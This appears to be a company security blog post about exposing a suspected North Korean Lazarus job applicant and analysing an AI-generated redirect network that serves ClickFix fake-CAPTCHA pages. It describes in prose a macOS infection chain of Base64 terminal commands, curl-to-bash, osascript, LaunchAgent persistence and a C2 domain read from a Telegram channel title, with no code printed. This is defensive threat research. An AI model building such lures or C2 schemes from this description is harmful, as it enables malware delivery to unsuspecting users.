Since our last article, a lot has happened.

Some things are new, some things remain quite resembling of what we have previously experienced. Among those latter things, there’s a constant that has now become a sort of habit.

One that is too weird to fully get used to, and just too rare to simply let it become routine.

Of course, I’m talking about North Koreans. We just had a new encounter with a Lazarus boy who wanted to join the Bitso ranks, and we’ll speak about it below.

On the other hand, regarding the new things, we have two announcements: we just discovered a weird fully AI-powered campaign that promotes all kinds of malicious content using domains resembling popular crypto exchanges (which we’ll discuss today as well).

And the second announcement is that we will soon speak at two major conferences in Mexico 🇲🇽 and Colombia 🇨🇴 regarding our work interviewing Lazarus agents. We’ll post the dates soon, once the official announcements are made for each event.

In the meantime, enjoy this post about North Koreans, malware, and AI-powered malicious content networks.

Interview with the Chollima Extended Edition

As always, it all started with a candidate wanting to join Bitso as an engineer. The usual story: you are good at coding, we like people who are good at coding, so we set up an interview to get to know each other and be good at coding together.

But then reality hits: the candidate is not who he claims to be.

And once again, we find ourselves stuck in a call with a Chollima.

Or better said, he is stuck in a call with our Talent Acquisition Specialist, who knows exactly what is going on and is fully prepared to catch him on tape and expose his fake identity.

The interview goes as expected, with him claiming to be named Camilo Andrés Pantoja from Colombia. He even reaffirms his nationality when asked.

The conversation quickly moves to Sofía asking him to perform a few simple tasks and switching to Spanish. So far, the same old trick (from both sides).

But then, something new happens. Watch the video and see if you can spot it:

Sofía shares with him a link to a Canary Token, a defensive measure that, when visited, reveals information about the visitor, such as their browser and IP address.

Normally, these actors hide their origin IP behind a VPS (cloud instance), VPNs like AstrillVPN, or by bouncing through residential proxies. In this case, however, what we discovered was… interesting.

Our dear Camilo joined the call using a residential internet connection from Bogotá, Colombia.

This could mean one of two things.

Either Camilo is using a residential proxy, although this IP address is labelled across multiple intelligence platforms as domestic, non-VPN, non-VPS/hosting, and non-proxy (at least, for now).

Or Camilo has someone in Colombia assisting him in landing the job and providing him with a vantage point from a local network. Better said, a national facilitator. You know, those guys who lend a laptop to a Lazarus operative so he can join the interviews using AnyDesk and “working remotely”.

This may sound grim, but it is something your Security and People teams should absolutely prepare for: a frontman either conducting an interview on behalf of a Lazarus agent or lending them the infrastructure to commit a fraudulent job application.

Also, did you notice how he never looks directly at the camera and instead seems focused on something off to the side of his desk? That is probably because they use live AI-assisted tools to answer questions during interviews. Creepy, isn’t it?

But let’s take a break. The internet is not just a bunch of bad guys trying to rob you. There are also robots trying to do it as well.

And they said AI wouldn’t take anyone’s job…

Malware Dadaism

In Van Doesburg’s words, “Dada is yes-no, a bird on four legs, a ladder without steps, a square without angles”. Dadaism was anything except art, anti-art, let’s say.

If I had to define this malicious campaign in words, I would say it is anything but malware as we know it, “anti-malware” (despite the original meaning).

If I had to define it with a picture, it would be Tatlin at Home, or Cut with the Kitchen Knife […]. Please, take a moment to look at them.

See? This is exactly how it feels to disassemble and reverse engineer this campaign, it’s just too much happening everywhere at the same time.

It all started with an alert from our Brand Protection provider, who found a recently registered domain impersonating our brand. But far from being yet another copycat or fake support website, browsing it would randomly redirect the visitors to all kinds of content unrelated to us. And I mean anything (take another look at those paintings while we are here): fake CAPTCHAs which were actually ClickFix attacks, fake news outlets with AI-generated headlines and pictures, and even YouTube and Spotify channels featuring AI-generated content ranging from music and “radio streams” to philosophy and short stories.

A whole clanker network dedicated to distributing the most random things ever found on the internet, none of it actually related to our brand.

Every click would send you on a mystery trip through a different set of redirectors, questionable ad networks, and mirrors before eventually landing somewhere completely unknown and bizarre.

We should have stopped there and simply requested a takedown, but the possibility of finding new malware was worth the effort. So we called this thing “AI-dvertiser” and added it to our bestiary.

First thing we noticed: Geolocation, IP address, or the visitor’s country had no visible effect on what was served to the victim when visiting the domain, so it is safe to assume that everything had roughly the same chance of being offered to the user, weirdly enough.

Of course, since our interest lies in malware, we paid special attention to the ClickFix landing pages in all their variants. As mentioned, their chance of appearing was completely random, with the same probability of being served as the music channels.

So, we spent quite some time hunting them down, at least we had something to listen to in the process.

We managed to identify four different templates impersonating CAPTCHAs from Cloudflare, Google reCAPTCHA, and Sift.

Most of them correctly identified the victim’s operating system, delivering, in my case, a macOS payload which, despite differences in encoding, contained virtually the same malicious content once decoded (which we’ll analyze in a minute).

Only one of them, posing as Google reCAPTCHA, failed to fingerprint my system and consistently delivered a PowerShell variant intended for Windows, which of course would not work on my setup.

So let’s take a look at what these misunderstood malware artists are up to.

The first three samples we recovered were not really different malware families, but rather different masks for the same delivery chain: Base64 wrapped around more Base64, paired with curl, bash, osascript, LaunchAgents and disposable domains all glued together into a barely coherent mess.

The infection flow itself is surprisingly simple. The victim solves a fake CAPTCHA and is instructed to paste a Base64-encoded command into their terminal. That command downloads a remote shell script using curl, pipes it directly into bash, and from there the malware pivots into osascript, Apple’s native utility for executing AppleScript code.

The AppleScript stage creates persistence through launchctl and macOS LaunchAgents, effectively turning legitimate operating system utilities into the malware’s entire deployment stack.

But the weirdest part by far was the command and control infrastructure.

The malware periodically visits a public Telegram channel and reads its title. Literally the title. Whatever domain is written there becomes the active C2 endpoint.

So whenever one of their domains gets taken down, the operators simply rename the Telegram channel. Infected hosts revisit the page, read the new title and continue beaconing to the updated infrastructure.

It is absurdly improvised, yet somehow works.

Even more curious, the malware does not seem particularly interested in immediately exploiting the victim. After infection, it establishes persistence, registers the host, resolves the active C2 and mostly just sits there waiting.

At least from what we observed, the operation feels much more manual than automated, almost like the operators are collecting shells first and deciding what to do with them later.

The Windows variant follows the same spirit, but that’s a story for another day, as this post is already getting too long.

As of today, you can find the samples on MalwareBazaar if you want to poke them with a stick without having to walk through the same LLM-fertilized jungle we did.

And believe me, you do not want to.

As usual, stay safe,

get yourself a good Brand Protection service,

do not paste random commands into your terminal just because a website tells you to,

don’t weaponize clankers,

and don’t get rekt.

References & IOCs

• LevelBlue Labs OTX - Original Intelligence Pulse + IOCs by Quetzal Team.